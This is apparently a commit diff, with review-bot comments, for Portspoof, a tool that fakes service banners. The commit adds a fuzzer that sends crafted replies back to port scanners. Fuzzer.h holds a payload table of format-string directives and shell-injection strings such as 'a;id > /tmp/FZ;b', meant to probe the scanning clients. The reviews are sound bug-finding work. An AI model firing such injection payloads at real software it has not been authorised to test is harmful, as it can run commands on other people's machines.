major update
parent
c4a2632fa4
commit
43eceb605d
@ -8,12 +8,9 @@ Configuration::Configuration()
|
||||
bind_ip=std::string();
|
||||
port=DEFAULT_PORT;
|
||||
opts=0;
|
||||
|
||||
|
||||
nmapfuzzsignatures_file = std::string(NMAP_FUZZ_FILE_SIG);
|
||||
fuzzpayload_file = std::string(FUZZ_FILE_PAYLOAD);
|
||||
counter=0;
|
||||
|
||||
|
||||
return;
|
||||
}
|
||||
|
||||
@ -28,13 +25,14 @@ void Configuration::usage(void)
|
||||
"Portspoof - service signature obfuscator.\n\n"
|
||||
"-i bind to a user defined IP address\n"
|
||||
"-p bind to a user defined PORT number\n"
|
||||
"-f custom signture file\n"
|
||||
"-s custom signture file\n"
|
||||
"-c configuration file\n"
|
||||
"-l log port scanning alerts to a file\n"
|
||||
"-d disable syslog\n"
|
||||
"-v be verbose\n"
|
||||
"-x fuzz\n"
|
||||
"-y nmap wrap fuzz\n"
|
||||
"-f read fuzz payload list\n"
|
||||
"-1 generate fuzzing payloads\n"
|
||||
"-n nmap wrap fuzz signatures\n"
|
||||
"-h display this help and exit\n\n"
|
||||
"Without any OPTION - use default values and continue\n");
|
||||
|
||||
@ -46,7 +44,7 @@ bool Configuration::processArgs(int argc, char** argv)
|
||||
int ch;
|
||||
extern char *__progname;
|
||||
|
||||
while ((ch = getopt(argc, argv,"l:i:p:f:c:y:x:dvh")) != -1) {
|
||||
while ((ch = getopt(argc, argv,"l:i:p:s:c:f:n:dvh123")) != -1) {
|
||||
switch (ch) {
|
||||
case 'i':
|
||||
this->bind_ip = std::string(optarg);
|
||||
@ -56,7 +54,7 @@ bool Configuration::processArgs(int argc, char** argv)
|
||||
this->port = atoi(optarg);
|
||||
this->opts[OPT_PORT]=1;
|
||||
break;
|
||||
case 'f':
|
||||
case 's':
|
||||
this->signaturefile = std::string(optarg);
|
||||
this->opts[OPT_SIG_FILE]=1;
|
||||
|
||||
@ -79,16 +77,28 @@ bool Configuration::processArgs(int argc, char** argv)
|
||||
this->logfile = std::string(optarg);
|
||||
fprintf(stdout,"-> Using log file %s\n",this->logfile.c_str());
|
||||
break;
|
||||
case 'x':
|
||||
this->opts[OPT_FUZZ]=1;
|
||||
case 'f':
|
||||
this->opts[OPT_FUZZ_WORDLIST]=1;
|
||||
this->fuzzpayload_file=std::string(optarg);
|
||||
fprintf(stdout,"-> Fuzzing mode!\n");
|
||||
fprintf(stdout,"-> Reading fuzzing payloads from a file!\n");
|
||||
break;
|
||||
case 'y':
|
||||
case 'n':
|
||||
this->opts[OPT_FUZZ_NMAP]=1;
|
||||
this->nmapfuzzsignatures_file=std::string(optarg);
|
||||
fprintf(stdout,"-> NMAP Fuzzing mode!\n");
|
||||
fprintf(stdout,"-> NMAP wrapper mode!\n");
|
||||
break;
|
||||
case '1':
|
||||
this->opts[OPT_FUZZ_INTERNAL]=1;
|
||||
fprintf(stdout,"-> Generate fuzzing payloads!\n");
|
||||
break;
|
||||
case '2':
|
||||
this->opts[OPT_NOT_NMAP_SCANNER]=1;
|
||||
fprintf(stdout,"-> Switching to simple reply mode (anything apart from Nmap)!\n");
|
||||
break;
|
||||
case '3':
|
||||
this->opts[OPT_FUZZ_RANDOM]=1;
|
||||
fprintf(stdout,"-> Random int fuzzing!\n");
|
||||
break;
|
||||
case 'h':
|
||||
this->usage();
|
||||
break;
|
||||
@ -105,6 +115,10 @@ bool Configuration::processArgs(int argc, char** argv)
|
||||
fprintf(stdout,"-> No parameters - using default values.\n");
|
||||
}
|
||||
|
||||
if(this->getConfigValue(OPT_FUZZ_NMAP) ||this->getConfigValue(OPT_FUZZ_WORDLIST) || this->getConfigValue(OPT_FUZZ_INTERNAL))
|
||||
this->fuzzer=new Fuzzer(this);
|
||||
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
@ -116,6 +130,15 @@ std::string Configuration::getSignatureFile()
|
||||
{
|
||||
return this->signaturefile;
|
||||
|
||||
}
|
||||
std::string Configuration::getNmapfuzzSignaturesFile()
|
||||
{
|
||||
return this->nmapfuzzsignatures_file;
|
||||
}
|
||||
std::string Configuration::getFuzzPayloadFile()
|
||||
{
|
||||
return this->fuzzpayload_file;
|
||||
|
||||
}
|
||||
std::string Configuration::getLogFile()
|
||||
{
|
||||
@ -135,7 +158,7 @@ unsigned short int Configuration::getPort()
|
||||
std::vector<char> Configuration::mapPort2Signature(unsigned short port)
|
||||
{
|
||||
/*
|
||||
if(this->opts&OPT_FUZZ)
|
||||
if(this->opts&OPT_FUZZ_WORDLIST
|
||||
{
|
||||
|
||||
std::string input_line;
|
||||
@ -148,10 +171,10 @@ std::vector<char> Configuration::mapPort2Signature(unsigned short port)
|
||||
|
||||
}
|
||||
*/
|
||||
if(this->opts[OPT_FUZZ_NMAP])
|
||||
if(this->opts[OPT_FUZZ_NMAP] || this->opts[OPT_FUZZ_INTERNAL] || this->opts[OPT_FUZZ_WORDLIST])
|
||||
{
|
||||
std::vector<char> result_vector;
|
||||
result_vector=this->GetFUZZ();
|
||||
result_vector=this->fuzzer->GetFUZZ();
|
||||
return result_vector;
|
||||
}
|
||||
else
|
||||
@ -257,81 +280,3 @@ bool Configuration::readConfigFile()
|
||||
|
||||
}
|
||||
|
||||
|
||||
bool Configuration::PrepareFuzzer()
|
||||
{
|
||||
|
||||
this->fp_payloads=fopen(this->fuzzpayload_file.c_str(), "r");
|
||||
if ( this->fp_payloads == NULL) {
|
||||
fprintf(stdout,"Error opening payload file: %s \n",this->fuzzpayload_file.c_str());
|
||||
return 1;
|
||||
}
|
||||
|
||||
/////
|
||||
|
||||
FILE *fp = fopen(this->nmapfuzzsignatures_file.c_str(), "r");
|
||||
if (fp == NULL) {
|
||||
fprintf(stdout,"Error opening nmap signature file: %s \n",this->nmapfuzzsignatures_file.c_str());
|
||||
return 1;
|
||||
}
|
||||
|
||||
char buf_file[BUFSIZE];
|
||||
while (fgets(buf_file, BUFSIZE, fp))
|
||||
nmapfuzzsignatures.push_back(std::string(buf_file));
|
||||
fclose(fp);
|
||||
|
||||
fprintf(stdout,"-> Nmap signatures read: %d \n",this->nmapfuzzsignatures.size());
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
std::vector<char> Configuration::GetFUZZ()
|
||||
{
|
||||
|
||||
|
||||
char buf_file[BUFSIZE];
|
||||
std::string input_wrapped,input_wrapped2;
|
||||
std::vector<char> result_vector;
|
||||
|
||||
|
||||
if(this->counter%this->nmapfuzzsignatures.size()==0)
|
||||
{
|
||||
|
||||
|
||||
if(fgets(buf_file, BUFSIZE, this->fp_payloads)==NULL)
|
||||
{
|
||||
fprintf(stdout,"EOF of payload file\n");
|
||||
fflush(stdout);
|
||||
}
|
||||
this->input_line=std::string(buf_file);
|
||||
this->input_line.erase(input_line.size() - 1);//remove \n
|
||||
|
||||
}
|
||||
|
||||
|
||||
input_wrapped=Utils::wrapNMAP(this->nmapfuzzsignatures[this->counter%this->nmapfuzzsignatures.size()],this->input_line);
|
||||
input_wrapped2=Utils::unescape(input_wrapped);
|
||||
|
||||
|
||||
this->counter++;
|
||||
|
||||
for(int i=0; i<input_wrapped2.length();i++)
|
||||
result_vector.push_back(input_wrapped2[i]);
|
||||
|
||||
return result_vector;
|
||||
|
||||
|
||||
}
|
||||
|
||||
/*
|
||||
std::string input_line;
|
||||
std::getline(std::cin, input_line);
|
||||
|
||||
|
||||
for(int i=0; i<input_line.length();i++)
|
||||
result_vector.push_back(input_line[i]);
|
||||
return result_vector;
|
||||
*/
|
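Review bot: `fuzzer` is assigned in processArgs only when one of the three fuzz options is set, and none of the constructor lines visible in the first hunk give it an initial value, so on every other run the member holds an indeterminate pointer. mapPort2Signature calls `this->fuzzer->GetFUZZ()` under the same three flags, which is safe only while nothing sets those bits after processArgs has returned; readConfigFile lies outside the visible hunks, so that needs confirming. I would add `fuzzer=NULL;` to the constructor and test `this->fuzzer!=NULL` before the call in mapPort2Signature. The object created with `new Fuzzer(this)` is also never released in the lines shown. Both the constructor and processArgs start outside their hunks.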
@ -8,7 +8,7 @@
|
||||
#define LOG_FILE "portspoof.log"
|
||||
#define CONF_FILE "portspoof.conf"
|
||||
#define SIGNATURE_FILE "signatures"
|
||||
#define OPT_FUZZ 1
|
||||
#define OPT_FUZZ_WORDLIST 1
|
||||
#define OPT_IP 2
|
||||
#define OPT_PORT 3
|
||||
#define OPT_DEBUG 4
|
||||
@ -17,7 +17,9 @@
|
||||
#define OPT_SYSLOG_DIS 7
|
||||
#define OPT_CONFIG_FILE 8
|
||||
#define OPT_FUZZ_NMAP 9
|
||||
|
||||
#define OPT_FUZZ_INTERNAL 10
|
||||
#define OPT_NOT_NMAP_SCANNER 11
|
||||
#define OPT_FUZZ_RANDOM 12
|
||||
|
||||
#define MAX_PORTS 65535
|
||||
|
||||
@ -48,6 +50,9 @@ using namespace std;
|
||||
typedef map < unsigned short, std::vector<char> > Port_Signature_Map;
|
||||
typedef vector < string > Raw_Signatures_Vector;
|
||||
typedef vector < string > Nmap_Fuzz_Vector;
|
||||
class Fuzzer;
|
||||
|
||||
#include "Fuzzer.h"
|
||||
|
||||
|
||||
class Configuration {
|
||||
@ -57,39 +62,31 @@ class Configuration {
|
||||
std::string logfile;
|
||||
std::string bind_ip;
|
||||
unsigned short int port;
|
||||
bitset<10> opts;
|
||||
|
||||
unsigned short ifuzz;
|
||||
bitset<20> opts;
|
||||
Fuzzer* fuzzer;
|
||||
std::string nmapfuzzsignatures_file;
|
||||
std::string fuzzpayload_file;
|
||||
Port_Signature_Map portsignatureemap;
|
||||
Raw_Signatures_Vector rawsignatures;
|
||||
|
||||
//fuzzing part
|
||||
std::string nmapfuzzsignatures_file;
|
||||
std::string fuzzpayload_file;
|
||||
Nmap_Fuzz_Vector nmapfuzzsignatures;
|
||||
FILE *fp_payloads;
|
||||
int counter;
|
||||
std::string input_line;
|
||||
|
||||
public:
|
||||
Configuration();
|
||||
|
||||
void usage(void);
|
||||
bool processArgs(int argc, char** argv);
|
||||
bool readConfigFile();
|
||||
std::vector<char> mapPort2Signature(unsigned short port);
|
||||
void usage(void);
|
||||
bool getConfigValue(int value);
|
||||
bool processSignatureFile();
|
||||
|
||||
//getters
|
||||
std::string getConfigFile();
|
||||
std::string getSignatureFile();
|
||||
std::string getLogFile();
|
||||
std::string getBindIP();
|
||||
std::string getNmapfuzzSignaturesFile();
|
||||
std::string getFuzzPayloadFile();
|
||||
bool getConfigValue(int value);
|
||||
unsigned short int getPort();
|
||||
bool processSignatureFile();
|
||||
|
||||
//fuzzing part
|
||||
bool PrepareFuzzer();
|
||||
std::vector<char> GetFUZZ();
|
||||
|
||||
|
||||
};
|
||||
|
||||
|
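Review bot: The added `#include "Fuzzer.h"` creates an include cycle, because Fuzzer.h as added by this commit includes Configuration.h in turn. The forward declaration `class Fuzzer;` just above it is already sufficient for the `Fuzzer* fuzzer;` member, so the include can move into Configuration.cpp. As written, a translation unit that pulls in Configuration.h first appears to reach the body of `class Fuzzer` before `Configuration` has been declared; Fuzzer.h would then need its own `class Configuration;`. Separately, `bitset<20>` is a bare size with no link to the OPT_ indices it must cover, and a named count next to the macros would keep the two in step.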
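--- /dev/null
+++ b/src/Fuzzer.cpp
@@ -0,0 +1,182 @@
+#include "Fuzzer.h"
+
+Fuzzer::Fuzzer()
+{
+
+
+return;
+}
+
+Fuzzer::Fuzzer(Configuration* configuration)
+{
+
+this->configuration = configuration;
+this->nmapfuzzsignatures_file = configuration->getNmapfuzzSignaturesFile();
+this->fuzzpayload_file = configuration->getFuzzPayloadFile();
+this->counter=0;
+this->payload_counter=0;
+this->PrepareFuzzer();
+
+return;
+}
+
+
+bool Fuzzer::PrepareFuzzer()
+{
+
+if(this->configuration->getConfigValue(OPT_FUZZ_WORDLIST))
+{
+
+this->fp_payloads=fopen(this->fuzzpayload_file.c_str(), "r");
+if ( this->fp_payloads == NULL) {
+fprintf(stdout,"Error opening payload file: %s \n",this->fuzzpayload_file.c_str());
+return 1;
+}
+
+}
+/////
+
+if(this->configuration->getConfigValue(OPT_FUZZ_NMAP))
+{
+
+FILE *fp = fopen(this->nmapfuzzsignatures_file.c_str(), "r");
+if (fp == NULL) {
+fprintf(stdout,"Error opening nmap signature file: %s \n",this->nmapfuzzsignatures_file.c_str());
+return 1;
+}
+
+char buf_file[BUFSIZE];
+while (fgets(buf_file, BUFSIZE, fp))
+nmapfuzzsignatures.push_back(std::string(buf_file));
+fclose(fp);
+fprintf(stdout,"-> Nmap signatures read: %d \n",this->nmapfuzzsignatures.size());
+
+}
+
+return 0;
+
+}
+
+std::vector<char> Fuzzer::intToBytes(int paramInt)
+{
+vector<char> arrayOfByte(4);
+for (int i = 0; i < 4; i++)
+arrayOfByte[3 - i] = (paramInt >> (i * 8));
+return arrayOfByte;
+}
+
+
+std::vector<char> Fuzzer::shortToBytes(unsigned short paramInt)
+{
+vector<char> arrayOfByte(2);
+for (int i = 0; i < 2; i++)
+arrayOfByte[1 - i] = (paramInt >> (i * 4));
+return arrayOfByte;
+}
+
+std::vector<char> Fuzzer::GenerateFuzzPayload()
+{
+std::vector<char> result_vector;
+std::string str;
+
+/*
+for(int i=0;i<255;i++)
+result_vector.push_back(i);
+
+return result_vector;
+
+
+
+if(this->configuration->getConfigValue(OPT_FUZZ_RANDOM))
+{
+this->payload_counter++;
+return this->shortToBytes((unsigned short)this->payload_counter);
+
+}
+*/
+
+if(this->payload_counter<10)
+{
+for(int i=0;i<4000*(this->payload_counter+1);i++)
+result_vector.push_back(*(fuzz_oracle[0]));
+}
+else
+{
+
+str=std::string(fuzz_oracle[this->payload_counter-9]);
+result_vector=Utils::str2vector(str);
+}
+
+this->payload_counter++;
+
+if(this->payload_counter>=25)
+this->payload_counter=0;
+
+return result_vector;
+
+}
+
+std::vector<char> Fuzzer::GetFUZZ()
+{
+std::vector<char> result_vector;
+
+if(this->configuration->getConfigValue(OPT_FUZZ_WORDLIST))
+{
+
+
+if(this->counter%this->nmapfuzzsignatures.size()==0)
+{
+
+char buf_file[BUFSIZE];
+std::string str;
+
+if(fgets(buf_file, BUFSIZE, this->fp_payloads)==NULL)
+{
+fprintf(stdout,"EOF of payload file\n");
+fflush(stdout);
+}
+
+str=std::string(buf_file);
+str.erase(str.size() - 1);//remove \n
+this->input_line=Utils::str2vector(str);
+
+}
+
+this->counter++;
+
+}
+else if(this->configuration->getConfigValue(OPT_FUZZ_INTERNAL))
+{
+result_vector=this->GenerateFuzzPayload();
+}
+else
+fprintf(stdout,"Fuzz - shouldn't be here...\n");
+
+
+if(this->configuration->getConfigValue(OPT_FUZZ_NMAP))
+{
+
+if(this->configuration->getConfigValue(OPT_FUZZ_WORDLIST))
+result_vector=Utils::wrapNMAP(this->nmapfuzzsignatures[this->counter%this->nmapfuzzsignatures.size()],this->input_line);
+else if(this->configuration->getConfigValue(OPT_FUZZ_INTERNAL))
+result_vector=Utils::wrapNMAP(this->nmapfuzzsignatures[this->counter%this->nmapfuzzsignatures.size()],result_vector);
+
+result_vector=Utils::unescape(result_vector);
+
+}
+
+return result_vector;
+
+
+}
+
+
+/*
+std::string input_line;
+std::getline(std::cin, input_line);
+
+
+for(int i=0; i<input_line.length();i++)
+result_vector.push_back(input_line[i]);
+return result_vector;
+*/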
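Review bot: In GetFUZZ the result of `fgets` is only logged, so at the end of the payload file `buf_file` is still uninitialised when it is copied into `str`, and `str.erase(str.size() - 1)` on an empty string throws std::out_of_range. The same block takes `counter` modulo `nmapfuzzsignatures.size()`, which is zero whenever the word-list option is used without the nmap option, because PrepareFuzzer fills that vector only under OPT_FUZZ_NMAP. The constructor also discards PrepareFuzzer's return value and the start-up check in main is commented out by this commit, so a payload file that failed to open reaches `fgets` as a NULL stream. Returning early on each of these conditions and stripping the newline only when one is present covers all three; the fence shows the read path. Whether an empty reply is the right fallback is for the author to decide.

```cpp
// inside the OPT_FUZZ_WORDLIST branch of Fuzzer::GetFUZZ()
if(this->fp_payloads==NULL || this->nmapfuzzsignatures.empty())
    return result_vector; // no open payload file, or no signatures to cycle through

if(this->counter%this->nmapfuzzsignatures.size()==0)
{
    char buf_file[BUFSIZE];

    if(fgets(buf_file, BUFSIZE, this->fp_payloads)==NULL)
    {
        fprintf(stdout,"EOF of payload file\n");
        fflush(stdout);
        return result_vector; // buf_file holds no data at EOF
    }

    std::string str(buf_file);
    if(!str.empty() && str[str.size()-1]=='\n')
        str.erase(str.size() - 1); // strip the newline only when fgets stored one
    this->input_line=Utils::str2vector(str);
}
// … unchanged: counter increment, OPT_FUZZ_INTERNAL branch, nmap wrapping …
```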
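--- /dev/null
+++ b/src/Fuzzer.h
@@ -0,0 +1,75 @@
+#ifndef FUZZER_H
+#define FUZZER_H
+
+#include <string>
+#include <stdio.h>
+#include <ctype.h>
+#include <pcap.h>
+#include <map>
+#include <vector>
+#include <sstream>
+#include <unistd.h>
+#include <algorithm>
+#include <iostream>
+#include <ctime>
+#include <pthread.h>
+#include <iostream>
+#include <string>
+#include <iostream>
+#include <fstream>
+#include <sstream>
+
+#include "Utils.h"
+#include "Configuration.h"
+
+using namespace std;
+
+
+static const char* const fuzz_oracle[]=
+{
+"A",
+"%n%n%n%n%n",
+"%%20n",
+"%n%p%s%d%x",
+"%.1024d",
+"%.2049d",
+"-1",
+"32767",
+"65535",
+"-2147483647",
+"0xffffffff",
+"a|id > /tmp/FZ|b",
+"a`id > /tmp/FZ`b",
+"a'id > /tmp/FZ'b",
+"a;id > /tmp/FZ;b",
+"a&&id > /tmp/FZ&&b"
+};
+
+
+class Fuzzer{
+private:
+
+std::string nmapfuzzsignatures_file;
+std::string fuzzpayload_file;
+Nmap_Fuzz_Vector nmapfuzzsignatures;
+FILE *fp_payloads;
+std::vector<char> input_line;
+Configuration* configuration;
+int counter;
+int payload_counter;
+int nmapfuzzsignatures_size;
+
+public:
+Fuzzer();
+Fuzzer(Configuration* configuration);
+bool processSignatureFile();
+std::vector<char> GetFUZZ();
+std::vector<char> GenerateFuzzPayload();
+std::vector<char> intToBytes(int paramInt);
+std::vector<char> shortToBytes(unsigned short paramInt);
+
+bool PrepareFuzzer();
+};
+
+
+#endif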
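Review bot: GenerateFuzzPayload in Fuzzer.cpp indexes `fuzz_oracle` with `payload_counter-9` and wraps at the literal 25, so both numbers silently depend on this table having exactly sixteen entries; removing one makes the last index read past the array. I would keep the length beside the table, `static const size_t fuzz_oracle_count = sizeof(fuzz_oracle)/sizeof(fuzz_oracle[0]);`, and derive the wrap point from it. The table also deserves a short comment naming what each group probes (format-string directives, integer boundaries, shell metacharacters that would write /tmp/FZ on a client that executes them), so operators know what the service sends back to scanners. `processSignatureFile()` and `nmapfuzzsignatures_size` are declared here but not defined or used in Fuzzer.cpp as committed.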
@ -44,15 +44,42 @@ void Utils::hexdump(void *mem, unsigned int len)
|
||||
}
|
||||
}
|
||||
|
||||
string Utils::wrapNMAP(string wrapper,string payload)
|
||||
std::vector<char> Utils::wrapNMAP(string wrapper,std::vector<char> payload)
|
||||
{
|
||||
std::stringstream ss;
|
||||
stringstream ss;
|
||||
string str;
|
||||
std::vector<char> result_vector;
|
||||
|
||||
ss<<wrapper.substr(0,wrapper.find("__FUZZ__"));
|
||||
ss<<payload;
|
||||
str=ss.str();
|
||||
|
||||
for(int i=0; i<str.length();i++)
|
||||
result_vector.push_back(str[i]);
|
||||
|
||||
result_vector.insert(result_vector.end(),payload.begin(),payload.end());
|
||||
|
||||
ss.str("");
|
||||
ss<<wrapper.substr(wrapper.find("__FUZZ__")+strlen("__FUZZ__"),wrapper.size());
|
||||
return ss.str();
|
||||
|
||||
str=ss.str();
|
||||
|
||||
for(int i=0; i<str.length();i++)
|
||||
result_vector.push_back(str[i]);
|
||||
|
||||
return result_vector;
|
||||
}
|
||||
|
||||
std::vector<char> Utils::str2vector( std::string& s)
|
||||
{
|
||||
std::vector<char> result_vector;
|
||||
|
||||
for(int i=0; i<s.length();i++)
|
||||
result_vector.push_back(s[i]);
|
||||
|
||||
return result_vector;
|
||||
|
||||
|
||||
}
|
||||
int Utils::isNumeric (const char * s)
|
||||
{
|
||||
if (s == NULL || *s == '\0' || isspace(*s))
|
||||
@ -63,10 +90,10 @@ int Utils::isNumeric (const char * s)
|
||||
}
|
||||
|
||||
|
||||
std::string Utils::unescape(string& s)
|
||||
std::vector<char> Utils::unescape(std::vector<char> & s)
|
||||
{
|
||||
string res;
|
||||
string::const_iterator it = s.begin();
|
||||
std::vector<char> res;
|
||||
vector<char>::const_iterator it = s.begin();
|
||||
while (it != s.end())
|
||||
{
|
||||
char c = *it++;
|
||||
@ -75,13 +102,15 @@ std::string Utils::unescape(string& s)
|
||||
switch (*it++) {
|
||||
case 'n': c = '\n'; break;
|
||||
case 'r': c = '\r'; break;
|
||||
case 't': c = '\t'; break;
|
||||
|
||||
// all other escapes
|
||||
default:
|
||||
// invalid escape sequence - skip it. alternatively you can copy it as is, throw an exception...
|
||||
continue;
|
||||
}
|
||||
}
|
||||
res += c;
|
||||
res.push_back(c);
|
||||
}
|
||||
|
||||
return res;
|
||||
|
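Review bot: wrapNMAP calls `wrapper.find("__FUZZ__")` twice and never checks the result against `string::npos`. For a signature line without the marker the first `substr` copies the whole line, and `npos + strlen("__FUZZ__")` wraps round to 7, so the second `substr` appends the line again from offset 7, or throws std::out_of_range when the line is shorter than that. The wrappers are read from the nmap signature file, so a single malformed line is enough to trigger it. I would compute `const string::size_type pos = wrapper.find("__FUZZ__");` once, handle `pos == string::npos` explicitly, and use `pos` in both `substr` calls. The byte-by-byte copy loops added here and in str2vector can each be `result_vector.insert(result_vector.end(), str.begin(), str.end());`.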
@ -11,6 +11,7 @@
|
||||
#include <string>
|
||||
#include <sstream>
|
||||
#include <iostream>
|
||||
#include <vector>
|
||||
|
||||
|
||||
#ifndef HEXDUMP_COLS
|
||||
@ -27,8 +28,10 @@ class Utils {
|
||||
static void hexdump(void *mem, unsigned int len);
|
||||
static int isNumeric (const char * s);
|
||||
static char* get_substring_value(char* str);
|
||||
static string wrapNMAP(string wrapper,string payload);
|
||||
static std::string unescape( string& s);
|
||||
static std::vector<char> wrapNMAP(string wrapper,std::vector<char> payload);
|
||||
static std::vector<char> unescape( std::vector<char>& s);
|
||||
static std::vector<char> str2vector( std::string& s);
|
||||
|
||||
|
||||
};
|
||||
|
||||
|
BIN
src/a.out
BIN
src/a.out
Binary file not shown.
Binary file not shown.
@ -69,8 +69,8 @@ void nonblock(int sockfd)
|
||||
void* process_connection(void *arg)
|
||||
{
|
||||
int tid = *((int*)(&arg));
|
||||
int len,i;
|
||||
std:string str;
|
||||
//int len;
|
||||
string str;
|
||||
char buffer;
|
||||
int original_port=DEFAULT_PORT;
|
||||
int n = 0;
|
||||
@ -82,7 +82,7 @@ void* process_connection(void *arg)
|
||||
while(1) {
|
||||
|
||||
sleep(1);
|
||||
for(i = 0; i < MAX_CLIENT_PER_THREAD; i++)
|
||||
for(int i = 0; i < MAX_CLIENT_PER_THREAD; i++)
|
||||
{
|
||||
|
||||
if(threads[tid].clients[i] != 0)
|
||||
@ -90,7 +90,11 @@ void* process_connection(void *arg)
|
||||
|
||||
timestamp = time(NULL);
|
||||
|
||||
n = recv(threads[tid].clients[i], &buffer,1, 0);
|
||||
if(configuration->getConfigValue(OPT_NOT_NMAP_SCANNER))
|
||||
n = 1; // just reply...
|
||||
else
|
||||
n = recv(threads[tid].clients[i], &buffer,1, 0);
|
||||
|
||||
|
||||
// deal with different recv buffer size
|
||||
if(n == 0){
|
||||
@ -127,7 +131,6 @@ void* process_connection(void *arg)
|
||||
threads[tid].client_count--;
|
||||
pthread_mutex_unlock(&new_connection_mutex);
|
||||
|
||||
|
||||
}
|
||||
else if(n < 0){
|
||||
|
||||
@ -177,7 +180,6 @@ void* process_connection(void *arg)
|
||||
else
|
||||
{
|
||||
|
||||
|
||||
#ifdef OSX
|
||||
// BSD
|
||||
original_port = ntohs(peer_sockaddr.sin_port);
|
||||
@ -208,16 +210,15 @@ void* process_connection(void *arg)
|
||||
int buffertosendsize=vectsignature.size();
|
||||
char* buffertosend= (char*)malloc(buffertosendsize);
|
||||
|
||||
for(int i=0; i<buffertosendsize;i++)
|
||||
buffertosend[i]=vectsignature[i];
|
||||
for(int j=0; j<buffertosendsize;j++)
|
||||
buffertosend[j]=vectsignature[j];
|
||||
|
||||
if(configuration->getConfigValue(OPT_DEBUG))
|
||||
{
|
||||
|
||||
|
||||
fprintf(stdout,"signature sent -> ");
|
||||
unsigned int t=0;
|
||||
for(;t<buffertosendsize;t++)
|
||||
for(int t=0;t<buffertosendsize;t++)
|
||||
{
|
||||
if(*(buffertosend+t)==0)
|
||||
fprintf(stdout,"\\00");
|
||||
|
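Review bot: `buffertosend` comes from `malloc(buffertosendsize)` and is filled by the renamed `j` loop without a NULL check, while this commit widens the range of sizes that reach it: GenerateFuzzPayload builds replies of up to 40000 bytes, and GetFUZZ can return an empty vector, which turns the call into `malloc(0)`. Since `vectsignature` already owns contiguous storage the copy can be dropped, `const char* buffertosend = vectsignature.empty() ? NULL : &vectsignature[0];`, provided the code after this hunk neither modifies nor frees the buffer. If the copy stays, test the pointer before the loop. process_connection starts and ends outside the visible hunks, so the send call and any `free` are not shown.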
@ -12,7 +12,7 @@ void log_create(const char* file){
|
||||
|
||||
FILE *fp = fopen(configuration->getLogFile().c_str(), "a");
|
||||
if (fp == NULL) {
|
||||
FILE *fp = fopen(configuration->getLogFile().c_str(), "w");
|
||||
fp = fopen(configuration->getLogFile().c_str(), "w");
|
||||
}
|
||||
|
||||
fclose(fp);
|
||||
|
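Review bot: `fclose(fp)` still runs when both `fopen` calls fail, and passing NULL to fclose is undefined behaviour. The commit removes the shadowed inner `fp`, but the fallback to mode "w" can fail for the same reason the append did, for instance an unwritable directory. I would report the failure and return before the fclose: `if (fp == NULL) { fprintf(stderr,"Cannot open log file %s\n", configuration->getLogFile().c_str()); return; }`. The `file` parameter is not used in the lines shown; the path is taken from `configuration` instead.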
@ -121,25 +121,25 @@ int main(int argc, char** argv){
|
||||
|
||||
/* Find the properties for the device */
|
||||
if (pcap_lookupnet(configuration->getDevice().c_str(), &net, &mask, errbuf) == -1) {
|
||||
printf("Couldn't get netmask for device %s: %s\n", configuration->getDevice().c_str(), errbuf);
|
||||
fprintf(stdout,"Couldn't get netmask for device %s: %s\n", configuration->getDevice().c_str(), errbuf);
|
||||
net = 0;
|
||||
mask = 0;
|
||||
}
|
||||
|
||||
//promisc mode.
|
||||
if ( (descr = pcap_open_live(configuration->getDevice().c_str(), BUFSIZ, 1, 512, errbuf)) == NULL){
|
||||
printf("ERROR: %s\n", errbuf);
|
||||
fprintf(stdout,"ERROR: %s\n", errbuf);
|
||||
exit(1);
|
||||
}
|
||||
|
||||
cout<<"Promisc mode set"<<endl;
|
||||
|
||||
if (pcap_compile(descr, &fp, configuration->getFilter().c_str(), 0, net) == -1) {
|
||||
printf("Couldn't parse filter %s: %s\n", configuration->getFilter().c_str(), pcap_geterr(descr));
|
||||
fprintf(stdout,"Couldn't parse filter %s: %s\n", configuration->getFilter().c_str(), pcap_geterr(descr));
|
||||
exit(1);
|
||||
}
|
||||
if (pcap_setfilter(descr, &fp) == -1) {
|
||||
printf("Couldn't install filter %s: %s\n", configuration->getFilter().c_str(), pcap_geterr(descr));
|
||||
fprintf(stdout,"Couldn't install filter %s: %s\n", configuration->getFilter().c_str(), pcap_geterr(descr));
|
||||
exit(1);
|
||||
}
|
||||
|
||||
|
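Review bot: The four rewritten calls report failures but still write to stdout, so `fprintf(stdout, ...)` behaves exactly like the `printf` it replaces. Writing them as `fprintf(stderr,"ERROR: %s\n", errbuf);`, and likewise for the other three, keeps diagnostics out of redirected output and makes sure they are not lost in a buffer before the `exit(1)` calls.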
@ -84,7 +84,7 @@ int main(int argc, char **argv)
|
||||
|
||||
int sockd,newsockfd;
|
||||
int addrlen;
|
||||
int pid;
|
||||
//int pid;
|
||||
struct sockaddr_in my_name, peer_name;
|
||||
int status;
|
||||
|
||||
@ -99,7 +99,8 @@ int main(int argc, char **argv)
|
||||
|
||||
if(configuration->readConfigFile())
|
||||
exit(1);
|
||||
|
||||
|
||||
/*
|
||||
if(configuration->getConfigValue(OPT_FUZZ_NMAP))
|
||||
{
|
||||
if(configuration->PrepareFuzzer())
|
||||
@ -112,7 +113,7 @@ int main(int argc, char **argv)
|
||||
fprintf(stdout,"-> Preparing fuzzer!\n");
|
||||
|
||||
}
|
||||
|
||||
*/
|
||||
|
||||
|
||||
//check log file
|
||||
|
@ -279,6 +279,8 @@ char * fill_specialchars(char * str,int* param_len, int start_offset,int end_off
|
||||
int dot='.';
|
||||
int newline='n';
|
||||
int creturn='r';
|
||||
int tab='t';
|
||||
|
||||
|
||||
char* tmp; // tmp string for merging
|
||||
int tmplen=end_offset-start_offset;
|
||||
@ -326,6 +328,12 @@ char * fill_specialchars(char * str,int* param_len, int start_offset,int end_off
|
||||
tmpi++;
|
||||
i++;
|
||||
}
|
||||
else if(str[i]==bslash && i+1!=end_offset && str[i+1]==tab )
|
||||
{
|
||||
tmp[tmpi]='\t';
|
||||
tmpi++;
|
||||
i++;
|
||||
}
|
||||
else if(str[i]==dot && i!=start_offset && str[i-1]!=bslash)
|
||||
{
|
||||
|
||||
|
1
src/src/.deps/connection.Po
Normal file
1
src/src/.deps/connection.Po
Normal file
@ -0,0 +1 @@
|
||||
# dummy
|
231
src/src/.deps/connection.Tpo
Normal file
231
src/src/.deps/connection.Tpo
Normal file
@ -0,0 +1,231 @@
|
||||
connection.o connection.o: connection.c connection.h \
|
||||
/usr/include/sys/socket.h /usr/include/sys/types.h \
|
||||
/usr/include/sys/appleapiopts.h /usr/include/sys/cdefs.h \
|
||||
/usr/include/sys/_symbol_aliasing.h \
|
||||
